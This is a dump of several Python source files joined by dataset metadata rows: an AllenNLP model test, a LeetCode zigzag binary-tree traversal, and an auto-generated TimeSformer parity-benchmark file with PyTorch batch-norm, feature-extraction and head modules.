) -> Dict[str, Union[float, Dict[str, float]]]:
metrics = {k: v.get_metric(reset=reset)
for k, v in self._metrics.items()}
metrics['kl_weight'] = self.kl_weight
metrics['discriminator_weight'] = self.discriminator_weight
return metrics
def test_labeled():
from pprint import pprint
params = Params({
'token_embedder': {
'num_embeddings': 4,
'embedding_dim': 3
},
'code_dist_type': 'vmf',
'vmf_kappa': 100
})
vocab = Vocabulary()
while True:
vocab_size = vocab.get_vocab_size()
if vocab_size == 4:
break
vocab.add_token_to_namespace('a' + str(vocab_size))
model = SeparatedQuoraModel(params=params, vocab=vocab)
premise = {'tokens': torch.randint(low=0, high=4, size=(5, 6))}
hypothesis = {'tokens': torch.randint(low=0, high=4, size=(5, 7))}
label = torch.randint(low=0, high=3, size=(5,))
output = model(premise=premise, hypothesis=hypothesis, label=label)
pprint(output)
pprint(model.get_metrics())
def test_unlabeled():
from pprint import pprint
params = Params({
'token_embedder': {
'num_embeddings': 4,
'embedding_dim': 3
},
'code_dist_type': 'gaussian'
})
vocab = Vocabulary()
while True:
vocab_size = vocab.get_vocab_size()
if vocab_size == 4:
break
vocab.add_token_to_namespace('a' + str(vocab_size))
model = SeparatedQuoraModel(params=params, vocab=vocab)
premise = {'tokens': torch.randint(low=0, high=4, size=(5, 6))}
hypothesis = {'tokens': torch.randint(low=0, high=4, size=(5, 7))}
output = model(premise=premise, hypothesis=hypothesis, label=None)
pprint(output)
pprint(model.get_metrics())
if __name__ == '__main__':
test_labeled()
test_unlabeled()
| [
"[email protected]"
] | |
26abf2b58ee4ed7a69f2c069c5026e46fd6d5427 | 419873dd3b7412f704b1a7907b64a60b44cedf39 | /python/树/103. 二叉树的锯齿形层次遍历.py | b3b9739640c5bbaeecf8e7c3f913e970275761a9 | [] | no_license | Weless/leetcode | 0585c5bfa260713f44dabc51fa58ebf8a10e7814 | 0566622daa5849f7deb0cfdc6de2282fb3127f4c | refs/heads/master | 2021-11-13T07:59:20.299920 | 2021-10-25T02:09:53 | 2021-10-25T02:09:53 | 203,720,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 818 | py | class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
from typing import List
class Solution:
def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
from collections import deque
queue = deque()
queue.append(root)
res = []
level = 1
while queue:
tmp = []
for _ in range(len(queue)):
node = queue.popleft()
tmp.append(node.val)
if node.left: queue.append(node.left)
if node.right: queue.append(node.right)
if level % 2 == 0:
res.append(tmp[::-1])
else:
res.append(tmp)
level += 1
return res
| [
"[email protected]"
] | |
0a912a7112a0beabf813cc00fba1cdb7c2e3daad | d35167f7ab29813d926bd702fa652090556befdf | /generated/test_facebookresearch_TimeSformer.py | 7cf65f94103dda891ae436570da86b4a73b849eb | [] | no_license | jansel/pytorch-jit-paritybench | 65e5311d43daf5065beac52a68488ce188199fa8 | 7e55a422588c1d1e00f35a3d3a3ff896cce59e18 | refs/heads/master | 2023-08-12T04:43:16.669114 | 2023-06-08T17:36:32 | 2023-06-08T17:36:32 | 270,464,378 | 35 | 15 | null | 2023-06-08T17:36:34 | 2020-06-07T23:42:50 | Python | UTF-8 | Python | false | false | 111,676 | py | import sys
_module = sys.modules[__name__]
del sys
setup = _module
timesformer = _module
config = _module
defaults = _module
datasets = _module
build = _module
cv2_transform = _module
decoder = _module
kinetics = _module
loader = _module
multigrid_helper = _module
ssv2 = _module
transform = _module
utils = _module
video_container = _module
models = _module
batchnorm_helper = _module
build = _module
conv2d_same = _module
custom_video_model_builder = _module
features = _module
head_helper = _module
helpers = _module
linear = _module
losses = _module
nonlocal_helper = _module
operators = _module
optimizer = _module
resnet_helper = _module
stem_helper = _module
video_model_builder = _module
vit = _module
vit_utils = _module
ava_eval_helper = _module
ava_evaluation = _module
label_map_util = _module
metrics = _module
np_box_list = _module
np_box_list_ops = _module
np_box_mask_list = _module
np_box_mask_list_ops = _module
np_box_ops = _module
np_mask_ops = _module
object_detection_evaluation = _module
per_image_evaluation = _module
standard_fields = _module
benchmark = _module
bn_helper = _module
c2_model_loading = _module
checkpoint = _module
distributed = _module
env = _module
logging = _module
lr_policy = _module
meters = _module
metrics = _module
misc = _module
multigrid = _module
multiprocessing = _module
parser = _module
weight_init_helper = _module
visualization = _module
tensorboard_vis = _module
utils = _module
run_net = _module
submit = _module
test_net = _module
train_net = _module
visualization = _module
from _paritybench_helpers import _mock_config, patch_functional
from unittest.mock import mock_open, MagicMock
from torch.autograd import Function
from torch.nn import Module
import abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings
import numpy as np
from torch import Tensor
patch_functional()
open = mock_open()
yaml = logging = sys = argparse = MagicMock()
ArgumentParser = argparse.ArgumentParser
_global_config = args = argv = cfg = config = params = _mock_config()
argparse.ArgumentParser.return_value.parse_args.return_value = _global_config
yaml.load.return_value = _global_config
sys.argv = _global_config
__version__ = '1.0.0'
xrange = range
wraps = functools.wraps
import math
import numpy as np
import random
import torch
import torchvision.io as io
import torch.utils.data
import itertools
from torch.utils.data._utils.collate import default_collate
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data.sampler import RandomSampler
from torch.utils.data.sampler import Sampler
from itertools import chain as chain
import logging
import time
from collections import defaultdict
from functools import partial
import torch.distributed as dist
import torch.nn as nn
from torch.autograd.function import Function
import torch.nn.functional as F
from typing import Tuple
from typing import Optional
from typing import List
from collections import OrderedDict
from copy import deepcopy
from typing import Dict
from typing import Callable
import torch.utils.model_zoo as model_zoo
from torch import nn as nn
from torch import einsum
from torch.nn.modules.module import Module
from torch.nn.modules.activation import MultiheadAttention
from torch.nn import ReplicationPad3d
import copy
import warnings
from itertools import repeat
import functools
from collections import deque
from sklearn.metrics import average_precision_score
from matplotlib import pyplot as plt
from torch import nn
import logging as log
import matplotlib.pyplot as plt
from torch.utils.tensorboard import SummaryWriter
from torchvision.utils import make_grid
from sklearn.metrics import confusion_matrix
import scipy.io
class SubBatchNorm3d(nn.Module):
"""
The standard BN layer computes stats across all examples in a GPU. In some
cases it is desirable to compute stats across only a subset of examples
(e.g., in multigrid training https://arxiv.org/abs/1912.00998).
SubBatchNorm3d splits the batch dimension into N splits, and run BN on
each of them separately (so that the stats are computed on each subset of
examples (1/N of batch) independently. During evaluation, it aggregates
the stats from all splits into one BN.
"""
def __init__(self, num_splits, **args):
"""
Args:
num_splits (int): number of splits.
args (list): other arguments.
"""
super(SubBatchNorm3d, self).__init__()
self.num_splits = num_splits
num_features = args['num_features']
if args.get('affine', True):
self.affine = True
args['affine'] = False
self.weight = torch.nn.Parameter(torch.ones(num_features))
self.bias = torch.nn.Parameter(torch.zeros(num_features))
else:
self.affine = False
self.bn = nn.BatchNorm3d(**args)
args['num_features'] = num_features * num_splits
self.split_bn = nn.BatchNorm3d(**args)
def _get_aggregated_mean_std(self, means, stds, n):
"""
Calculate the aggregated mean and stds.
Args:
means (tensor): mean values.
stds (tensor): standard deviations.
n (int): number of sets of means and stds.
"""
mean = means.view(n, -1).sum(0) / n
std = stds.view(n, -1).sum(0) / n + ((means.view(n, -1) - mean) ** 2).view(n, -1).sum(0) / n
return mean.detach(), std.detach()
def aggregate_stats(self):
"""
Synchronize running_mean, and running_var. Call this before eval.
"""
if self.split_bn.track_running_stats:
self.bn.running_mean.data, self.bn.running_var.data = self._get_aggregated_mean_std(self.split_bn.running_mean, self.split_bn.running_var, self.num_splits)
def forward(self, x):
if self.training:
n, c, t, h, w = x.shape
x = x.view(n // self.num_splits, c * self.num_splits, t, h, w)
x = self.split_bn(x)
x = x.view(n, c, t, h, w)
else:
x = self.bn(x)
if self.affine:
x = x * self.weight.view((-1, 1, 1, 1))
x = x + self.bias.view((-1, 1, 1, 1))
return x
class GroupGather(Function):
"""
GroupGather performs all gather on each of the local process/ GPU groups.
"""
@staticmethod
def forward(ctx, input, num_sync_devices, num_groups):
"""
Perform forwarding, gathering the stats across different process/ GPU
group.
"""
ctx.num_sync_devices = num_sync_devices
ctx.num_groups = num_groups
input_list = [torch.zeros_like(input) for k in range(du.get_local_size())]
dist.all_gather(input_list, input, async_op=False, group=du._LOCAL_PROCESS_GROUP)
inputs = torch.stack(input_list, dim=0)
if num_groups > 1:
rank = du.get_local_rank()
group_idx = rank // num_sync_devices
inputs = inputs[group_idx * num_sync_devices:(group_idx + 1) * num_sync_devices]
inputs = torch.sum(inputs, dim=0)
return inputs
@staticmethod
def backward(ctx, grad_output):
"""
Perform backwarding, gathering the gradients across different process/ GPU
group.
"""
grad_output_list = [torch.zeros_like(grad_output) for k in range(du.get_local_size())]
dist.all_gather(grad_output_list, grad_output, async_op=False, group=du._LOCAL_PROCESS_GROUP)
grads = torch.stack(grad_output_list, dim=0)
if ctx.num_groups > 1:
rank = du.get_local_rank()
group_idx = rank // ctx.num_sync_devices
grads = grads[group_idx * ctx.num_sync_devices:(group_idx + 1) * ctx.num_sync_devices]
grads = torch.sum(grads, dim=0)
return grads, None, None
class NaiveSyncBatchNorm3d(nn.BatchNorm3d):
def __init__(self, num_sync_devices, **args):
"""
Naive version of Synchronized 3D BatchNorm.
Args:
num_sync_devices (int): number of device to sync.
args (list): other arguments.
"""
self.num_sync_devices = num_sync_devices
if self.num_sync_devices > 0:
assert du.get_local_size() % self.num_sync_devices == 0, (du.get_local_size(), self.num_sync_devices)
self.num_groups = du.get_local_size() // self.num_sync_devices
else:
self.num_sync_devices = du.get_local_size()
self.num_groups = 1
super(NaiveSyncBatchNorm3d, self).__init__(**args)
def forward(self, input):
if du.get_local_size() == 1 or not self.training:
return super().forward(input)
assert input.shape[0] > 0, 'SyncBatchNorm does not support empty inputs'
C = input.shape[1]
mean = torch.mean(input, dim=[0, 2, 3, 4])
meansqr = torch.mean(input * input, dim=[0, 2, 3, 4])
vec = torch.cat([mean, meansqr], dim=0)
vec = GroupGather.apply(vec, self.num_sync_devices, self.num_groups) * (1.0 / self.num_sync_devices)
mean, meansqr = torch.split(vec, C)
var = meansqr - mean * mean
self.running_mean += self.momentum * (mean.detach() - self.running_mean)
self.running_var += self.momentum * (var.detach() - self.running_var)
invstd = torch.rsqrt(var + self.eps)
scale = self.weight * invstd
bias = self.bias - mean * scale
scale = scale.reshape(1, -1, 1, 1, 1)
bias = bias.reshape(1, -1, 1, 1, 1)
return input * scale + bias
def get_same_padding(x: int, k: int, s: int, d: int):
return max((int(math.ceil(x // s)) - 1) * s + (k - 1) * d + 1 - x, 0)
def pad_same(x, k, s, d=(1, 1), value=0):
ih, iw = x.size()[-2:]
pad_h, pad_w = get_same_padding(ih, k[0], s[0], d[0]), get_same_padding(iw, k[1], s[1], d[1])
if pad_h > 0 or pad_w > 0:
x = F.pad(x, [pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2], value=value)
return x
def conv2d_same(x, weight: torch.Tensor, bias: Optional[torch.Tensor]=None, stride: Tuple[int, int]=(1, 1), padding: Tuple[int, int]=(0, 0), dilation: Tuple[int, int]=(1, 1), groups: int=1):
x = pad_same(x, weight.shape[-2:], stride, dilation)
return F.conv2d(x, weight, bias, stride, (0, 0), dilation, groups)
class Conv2dSame(nn.Conv2d):
""" Tensorflow like 'SAME' convolution wrapper for 2D convolutions
"""
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):
super(Conv2dSame, self).__init__(in_channels, out_channels, kernel_size, stride, 0, dilation, groups, bias)
def forward(self, x):
return conv2d_same(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)
class FeatureInfo:
def __init__(self, feature_info: List[Dict], out_indices: Tuple[int]):
prev_reduction = 1
for fi in feature_info:
assert 'num_chs' in fi and fi['num_chs'] > 0
assert 'reduction' in fi and fi['reduction'] >= prev_reduction
prev_reduction = fi['reduction']
assert 'module' in fi
self.out_indices = out_indices
self.info = feature_info
def from_other(self, out_indices: Tuple[int]):
return FeatureInfo(deepcopy(self.info), out_indices)
def get(self, key, idx=None):
""" Get value by key at specified index (indices)
if idx == None, returns value for key at each output index
if idx is an integer, return value for that feature module index (ignoring output indices)
if idx is a list/tupple, return value for each module index (ignoring output indices)
"""
if idx is None:
return [self.info[i][key] for i in self.out_indices]
if isinstance(idx, (tuple, list)):
return [self.info[i][key] for i in idx]
else:
return self.info[idx][key]
def get_dicts(self, keys=None, idx=None):
""" return info dicts for specified keys (or all if None) at specified indices (or out_indices if None)
"""
if idx is None:
if keys is None:
return [self.info[i] for i in self.out_indices]
else:
return [{k: self.info[i][k] for k in keys} for i in self.out_indices]
if isinstance(idx, (tuple, list)):
return [(self.info[i] if keys is None else {k: self.info[i][k] for k in keys}) for i in idx]
else:
return self.info[idx] if keys is None else {k: self.info[idx][k] for k in keys}
def channels(self, idx=None):
""" feature channels accessor
"""
return self.get('num_chs', idx)
def reduction(self, idx=None):
""" feature reduction (output stride) accessor
"""
return self.get('reduction', idx)
def module_name(self, idx=None):
""" feature module name accessor
"""
return self.get('module', idx)
def __getitem__(self, item):
return self.info[item]
def __len__(self):
return len(self.info)
def _get_feature_info(net, out_indices):
feature_info = getattr(net, 'feature_info')
if isinstance(feature_info, FeatureInfo):
return feature_info.from_other(out_indices)
elif isinstance(feature_info, (list, tuple)):
return FeatureInfo(net.feature_info, out_indices)
else:
assert False, 'Provided feature_info is not valid'
def _get_return_layers(feature_info, out_map):
module_names = feature_info.module_name()
return_layers = {}
for i, name in enumerate(module_names):
return_layers[name] = out_map[i] if out_map is not None else feature_info.out_indices[i]
return return_layers
def _module_list(module, flatten_sequential=False):
ml = []
for name, module in module.named_children():
if flatten_sequential and isinstance(module, nn.Sequential):
for child_name, child_module in module.named_children():
combined = [name, child_name]
ml.append(('_'.join(combined), '.'.join(combined), child_module))
else:
ml.append((name, name, module))
return ml
class FeatureDictNet(nn.ModuleDict):
""" Feature extractor with OrderedDict return
Wrap a model and extract features as specified by the out indices, the network is
partially re-built from contained modules.
There is a strong assumption that the modules have been registered into the model in the same
order as they are used. There should be no reuse of the same nn.Module more than once, including
trivial modules like `self.relu = nn.ReLU`.
Only submodules that are directly assigned to the model class (`model.feature1`) or at most
one Sequential container deep (`model.features.1`, with flatten_sequent=True) can be captured.
All Sequential containers that are directly assigned to the original model will have their
modules assigned to this module with the name `model.features.1` being changed to `model.features_1`
Arguments:
model (nn.Module): model from which we will extract the features
out_indices (tuple[int]): model output indices to extract features for
out_map (sequence): list or tuple specifying desired return id for each out index,
otherwise str(index) is used
feature_concat (bool): whether to concatenate intermediate features that are lists or tuples
vs select element [0]
flatten_sequential (bool): whether to flatten sequential modules assigned to model
"""
def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, feature_concat=False, flatten_sequential=False):
super(FeatureDictNet, self).__init__()
self.feature_info = _get_feature_info(model, out_indices)
self.concat = feature_concat
self.return_layers = {}
return_layers = _get_return_layers(self.feature_info, out_map)
modules = _module_list(model, flatten_sequential=flatten_sequential)
remaining = set(return_layers.keys())
layers = OrderedDict()
for new_name, old_name, module in modules:
layers[new_name] = module
if old_name in remaining:
self.return_layers[new_name] = str(return_layers[old_name])
remaining.remove(old_name)
if not remaining:
break
assert not remaining and len(self.return_layers) == len(return_layers), f'Return layers ({remaining}) are not present in model'
self.update(layers)
def _collect(self, x) ->Dict[str, torch.Tensor]:
out = OrderedDict()
for name, module in self.items():
x = module(x)
if name in self.return_layers:
out_id = self.return_layers[name]
if isinstance(x, (tuple, list)):
out[out_id] = torch.cat(x, 1) if self.concat else x[0]
else:
out[out_id] = x
return out
def forward(self, x) ->Dict[str, torch.Tensor]:
return self._collect(x)
class FeatureListNet(FeatureDictNet):
""" Feature extractor with list return
See docstring for FeatureDictNet above, this class exists only to appease Torchscript typing constraints.
In eager Python we could have returned List[Tensor] vs Dict[id, Tensor] based on a member bool.
"""
def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, feature_concat=False, flatten_sequential=False):
super(FeatureListNet, self).__init__(model, out_indices=out_indices, out_map=out_map, feature_concat=feature_concat, flatten_sequential=flatten_sequential)
def forward(self, x) ->List[torch.Tensor]:
return list(self._collect(x).values())
class FeatureHooks:
""" Feature Hook Helper
This module helps with the setup and extraction of hooks for extracting features from
internal nodes in a model by node name. This works quite well in eager Python but needs
redesign for torcscript.
"""
def __init__(self, hooks, named_modules, out_map=None, default_hook_type='forward'):
modules = {k: v for k, v in named_modules}
for i, h in enumerate(hooks):
hook_name = h['module']
m = modules[hook_name]
hook_id = out_map[i] if out_map else hook_name
hook_fn = partial(self._collect_output_hook, hook_id)
hook_type = h['hook_type'] if 'hook_type' in h else default_hook_type
if hook_type == 'forward_pre':
m.register_forward_pre_hook(hook_fn)
elif hook_type == 'forward':
m.register_forward_hook(hook_fn)
else:
assert False, 'Unsupported hook type'
self._feature_outputs = defaultdict(OrderedDict)
def _collect_output_hook(self, hook_id, *args):
x = args[-1]
if isinstance(x, tuple):
x = x[0]
self._feature_outputs[x.device][hook_id] = x
def get_output(self, device) ->Dict[str, torch.tensor]:
output = self._feature_outputs[device]
self._feature_outputs[device] = OrderedDict()
return output
class FeatureHookNet(nn.ModuleDict):
""" FeatureHookNet
Wrap a model and extract features specified by the out indices using forward/forward-pre hooks.
If `no_rewrite` is True, features are extracted via hooks without modifying the underlying
network in any way.
If `no_rewrite` is False, the model will be re-written as in the
FeatureList/FeatureDict case by folding first to second (Sequential only) level modules into this one.
FIXME this does not currently work with Torchscript, see FeatureHooks class
"""
def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, out_as_dict=False, no_rewrite=False, feature_concat=False, flatten_sequential=False, default_hook_type='forward'):
super(FeatureHookNet, self).__init__()
assert not torch.jit.is_scripting()
self.feature_info = _get_feature_info(model, out_indices)
self.out_as_dict = out_as_dict
layers = OrderedDict()
hooks = []
if no_rewrite:
assert not flatten_sequential
if hasattr(model, 'reset_classifier'):
model.reset_classifier(0)
layers['body'] = model
hooks.extend(self.feature_info.get_dicts())
else:
modules = _module_list(model, flatten_sequential=flatten_sequential)
remaining = {f['module']: (f['hook_type'] if 'hook_type' in f else default_hook_type) for f in self.feature_info.get_dicts()}
for new_name, old_name, module in modules:
layers[new_name] = module
for fn, fm in module.named_modules(prefix=old_name):
if fn in remaining:
hooks.append(dict(module=fn, hook_type=remaining[fn]))
del remaining[fn]
if not remaining:
break
assert not remaining, f'Return layers ({remaining}) are not present in model'
self.update(layers)
self.hooks = FeatureHooks(hooks, model.named_modules(), out_map=out_map)
def forward(self, x):
for name, module in self.items():
x = module(x)
out = self.hooks.get_output(x.device)
return out if self.out_as_dict else list(out.values())
class ResNetBasicHead(nn.Module):
"""
ResNe(X)t 3D head.
This layer performs a fully-connected projection during training, when the
input size is 1x1x1. It performs a convolutional projection during testing
when the input size is larger than 1x1x1. If the inputs are from multiple
different pathways, the inputs will be concatenated after pooling.
"""
def __init__(self, dim_in, num_classes, pool_size, dropout_rate=0.0, act_func='softmax'):
"""
The `__init__` method of any subclass should also contain these
arguments.
ResNetBasicHead takes p pathways as input where p in [1, infty].
Args:
dim_in (list): the list of channel dimensions of the p inputs to the
ResNetHead.
num_classes (int): the channel dimensions of the p outputs to the
ResNetHead.
pool_size (list): the list of kernel sizes of p spatial temporal
poolings, temporal pool kernel size, spatial pool kernel size,
spatial pool kernel size in order.
dropout_rate (float): dropout rate. If equal to 0.0, perform no
dropout.
act_func (string): activation function to use. 'softmax': applies
softmax on the output. 'sigmoid': applies sigmoid on the output.
"""
super(ResNetBasicHead, self).__init__()
assert len({len(pool_size), len(dim_in)}) == 1, 'pathway dimensions are not consistent.'
self.num_pathways = len(pool_size)
for pathway in range(self.num_pathways):
if pool_size[pathway] is None:
avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
else:
avg_pool = nn.AvgPool3d(pool_size[pathway], stride=1)
self.add_module('pathway{}_avgpool'.format(pathway), avg_pool)
if dropout_rate > 0.0:
self.dropout = nn.Dropout(dropout_rate)
self.projection = nn.Linear(sum(dim_in), num_classes, bias=True)
if act_func == 'softmax':
self.act = nn.Softmax(dim=4)
elif act_func == 'sigmoid':
self.act = nn.Sigmoid()
else:
raise NotImplementedError('{} is not supported as an activationfunction.'.format(act_func))
def forward(self, inputs):
assert len(inputs) == self.num_pathways, 'Input tensor does not contain {} pathway'.format(self.num_pathways)
pool_out = []
for pathway in range(self.num_pathways):
m = getattr(self, 'pathway{}_avgpool'.format(pathway))
pool_out.append(m(inputs[pathway]))
x = torch.cat(pool_out, 1)
x = x.permute((0, 2, 3, 4, 1))
if hasattr(self, 'dropout'):
x = self.dropout(x)
x = self.projection(x)
if not self.training:
x = self.act(x)
x = x.mean([1, 2, 3])
x = x.view(x.shape[0], -1)
return x
class X3DHead(nn.Module):
"""
X3D head.
This layer performs a fully-connected projection during training, when the
input size is 1x1x1. It performs a convolutional projection during testing
when the input size is larger than 1x1x1. If the inputs are from multiple
different pathways, the inputs will be concatenated after pooling.
"""
def __init__(self, dim_in, dim_inner, dim_out, num_classes, pool_size, dropout_rate=0.0, act_func='softmax', inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, bn_lin5_on=False):
"""
The `__init__` method of any subclass should also contain these
arguments.
X3DHead takes a 5-dim feature tensor (BxCxTxHxW) as input.
Args:
dim_in (int): the channel dimension C of the input.
num_classes (int): the channel dimensions of the output.
pool_size (list): the kernel sizes for spatiotemporal pooling
over the T x H x W dimensions.
dropout_rate (float): dropout rate. If equal to 0.0, perform no
dropout.
act_func (string): activation function to use. 'softmax': applies
softmax on the output. 'sigmoid': applies sigmoid on the output.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
bn_lin5_on (bool): if True, perform normalization on the features
before the classifier.
"""
super(X3DHead, self).__init__()
self.pool_size = pool_size
self.dropout_rate = dropout_rate
self.num_classes = num_classes
self.act_func = act_func
self.eps = eps
self.bn_mmt = bn_mmt
self.inplace_relu = inplace_relu
self.bn_lin5_on = bn_lin5_on
self._construct_head(dim_in, dim_inner, dim_out, norm_module)
def _construct_head(self, dim_in, dim_inner, dim_out, norm_module):
self.conv_5 = nn.Conv3d(dim_in, dim_inner, kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False)
self.conv_5_bn = norm_module(num_features=dim_inner, eps=self.eps, momentum=self.bn_mmt)
self.conv_5_relu = nn.ReLU(self.inplace_relu)
if self.pool_size is None:
self.avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
else:
self.avg_pool = nn.AvgPool3d(self.pool_size, stride=1)
self.lin_5 = nn.Conv3d(dim_inner, dim_out, kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False)
if self.bn_lin5_on:
self.lin_5_bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
self.lin_5_relu = nn.ReLU(self.inplace_relu)
if self.dropout_rate > 0.0:
self.dropout = nn.Dropout(self.dropout_rate)
self.projection = nn.Linear(dim_out, self.num_classes, bias=True)
if self.act_func == 'softmax':
self.act = nn.Softmax(dim=4)
elif self.act_func == 'sigmoid':
self.act = nn.Sigmoid()
else:
raise NotImplementedError('{} is not supported as an activation function.'.format(self.act_func))
def forward(self, inputs):
assert len(inputs) == 1, 'Input tensor does not contain 1 pathway'
x = self.conv_5(inputs[0])
x = self.conv_5_bn(x)
x = self.conv_5_relu(x)
x = self.avg_pool(x)
x = self.lin_5(x)
if self.bn_lin5_on:
x = self.lin_5_bn(x)
x = self.lin_5_relu(x)
x = x.permute((0, 2, 3, 4, 1))
if hasattr(self, 'dropout'):
x = self.dropout(x)
x = self.projection(x)
if not self.training:
x = self.act(x)
x = x.mean([1, 2, 3])
x = x.view(x.shape[0], -1)
return x
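# A minimal usage sketch for X3DHead (illustrative; assumes `torch` is imported
# earlier in this file). The head expands channels with conv_5/lin_5 before the
# final linear projection; the dims below mirror typical X3D-M values but are
# assumptions, not prescribed settings.
def _demo_x3d_head():
    head = X3DHead(dim_in=192, dim_inner=432, dim_out=2048, num_classes=400, pool_size=[16, 7, 7])
    clip = torch.randn(1, 192, 16, 7, 7)
    out = head([clip])
    assert out.shape == (1, 400)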
class Linear(nn.Linear):
def forward(self, input: torch.Tensor) ->torch.Tensor:
if torch.jit.is_scripting():
bias = self.bias if self.bias is not None else None
return F.linear(input, self.weight, bias=bias)
else:
return F.linear(input, self.weight, self.bias)
class Nonlocal(nn.Module):
"""
Builds Non-local Neural Networks as a generic family of building
blocks for capturing long-range dependencies. Non-local Network
computes the response at a position as a weighted sum of the
features at all positions. This building block can be plugged into
many computer vision architectures.
More details in the paper: https://arxiv.org/pdf/1711.07971.pdf
"""
def __init__(self, dim, dim_inner, pool_size=None, instantiation='softmax', zero_init_final_conv=False, zero_init_final_norm=True, norm_eps=1e-05, norm_momentum=0.1, norm_module=nn.BatchNorm3d):
"""
Args:
dim (int): number of dimension for the input.
dim_inner (int): number of dimension inside of the Non-local block.
pool_size (list): the kernel size of spatial temporal pooling,
temporal pool kernel size, spatial pool kernel size, spatial
pool kernel size in order. By default pool_size is None,
then there would be no pooling used.
instantiation (string): supports two different instantiation method:
"dot_product": normalizing correlation matrix with L2.
"softmax": normalizing correlation matrix with Softmax.
zero_init_final_conv (bool): If true, zero initializing the final
convolution of the Non-local block.
zero_init_final_norm (bool):
If true, zero initializing the final batch norm of the Non-local
block.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(Nonlocal, self).__init__()
self.dim = dim
self.dim_inner = dim_inner
self.pool_size = pool_size
self.instantiation = instantiation
self.use_pool = False if pool_size is None else any(size > 1 for size in pool_size)
self.norm_eps = norm_eps
self.norm_momentum = norm_momentum
self._construct_nonlocal(zero_init_final_conv, zero_init_final_norm, norm_module)
def _construct_nonlocal(self, zero_init_final_conv, zero_init_final_norm, norm_module):
self.conv_theta = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
self.conv_phi = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
self.conv_g = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
self.conv_out = nn.Conv3d(self.dim_inner, self.dim, kernel_size=1, stride=1, padding=0)
self.conv_out.zero_init = zero_init_final_conv
self.bn = norm_module(num_features=self.dim, eps=self.norm_eps, momentum=self.norm_momentum)
self.bn.transform_final_bn = zero_init_final_norm
if self.use_pool:
self.pool = nn.MaxPool3d(kernel_size=self.pool_size, stride=self.pool_size, padding=[0, 0, 0])
def forward(self, x):
x_identity = x
N, C, T, H, W = x.size()
theta = self.conv_theta(x)
if self.use_pool:
x = self.pool(x)
phi = self.conv_phi(x)
g = self.conv_g(x)
theta = theta.view(N, self.dim_inner, -1)
phi = phi.view(N, self.dim_inner, -1)
g = g.view(N, self.dim_inner, -1)
theta_phi = torch.einsum('nct,ncp->ntp', (theta, phi))
if self.instantiation == 'softmax':
theta_phi = theta_phi * self.dim_inner ** -0.5
theta_phi = nn.functional.softmax(theta_phi, dim=2)
elif self.instantiation == 'dot_product':
spatial_temporal_dim = theta_phi.shape[2]
theta_phi = theta_phi / spatial_temporal_dim
else:
raise NotImplementedError('Unknown norm type {}'.format(self.instantiation))
theta_phi_g = torch.einsum('ntg,ncg->nct', (theta_phi, g))
theta_phi_g = theta_phi_g.view(N, self.dim_inner, T, H, W)
p = self.conv_out(theta_phi_g)
p = self.bn(p)
return x_identity + p
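# A minimal sketch of the Nonlocal block (illustrative; assumes `torch` is
# imported earlier in this file). Because the block adds its output to the
# identity branch, it preserves the input shape exactly.
def _demo_nonlocal():
    nl = Nonlocal(dim=64, dim_inner=32, instantiation='softmax')
    x = torch.randn(2, 64, 4, 8, 8)
    assert nl(x).shape == x.shape  # residual connection keeps (N, C, T, H, W)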
class SwishEfficient(torch.autograd.Function):
"""Swish activation function: x * sigmoid(x)."""
@staticmethod
def forward(ctx, x):
result = x * torch.sigmoid(x)
ctx.save_for_backward(x)
return result
@staticmethod
def backward(ctx, grad_output):
x = ctx.saved_tensors[0]
sigmoid_x = torch.sigmoid(x)
return grad_output * (sigmoid_x * (1 + x * (1 - sigmoid_x)))
class Swish(nn.Module):
"""Swish activation function: x * sigmoid(x)."""
def __init__(self):
super(Swish, self).__init__()
def forward(self, x):
return SwishEfficient.apply(x)
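# A quick sanity sketch for the custom Swish autograd Function (illustrative;
# assumes `torch` is imported earlier in this file): the forward pass matches
# x * sigmoid(x), and the hand-written backward supports autograd.
def _demo_swish():
    x = torch.randn(4, requires_grad=True)
    y = Swish()(x)
    assert torch.allclose(y, x * torch.sigmoid(x))
    y.sum().backward()  # exercises SwishEfficient.backward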
class SE(nn.Module):
"""Squeeze-and-Excitation (SE) block w/ Swish: AvgPool, FC, Swish, FC, Sigmoid."""
def _round_width(self, width, multiplier, min_width=8, divisor=8):
"""
Round width of filters based on width multiplier
Args:
width (int): the channel dimensions of the input.
multiplier (float): the multiplication factor.
min_width (int): the minimum width after multiplication.
divisor (int): the new width should be dividable by divisor.
"""
if not multiplier:
return width
width *= multiplier
min_width = min_width or divisor
width_out = max(min_width, int(width + divisor / 2) // divisor * divisor)
if width_out < 0.9 * width:
width_out += divisor
return int(width_out)
def __init__(self, dim_in, ratio, relu_act=True):
"""
Args:
dim_in (int): the channel dimensions of the input.
ratio (float): the channel reduction ratio for squeeze.
relu_act (bool): whether to use ReLU activation instead
of Swish (default).
